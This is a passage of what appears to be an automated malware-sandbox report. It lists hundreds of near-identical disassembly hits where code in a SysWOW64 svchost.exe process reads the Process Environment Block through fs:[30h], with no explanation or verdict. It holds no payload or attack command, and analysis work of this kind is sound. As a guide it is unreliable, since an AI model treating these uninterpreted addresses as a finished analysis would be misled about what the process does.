            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
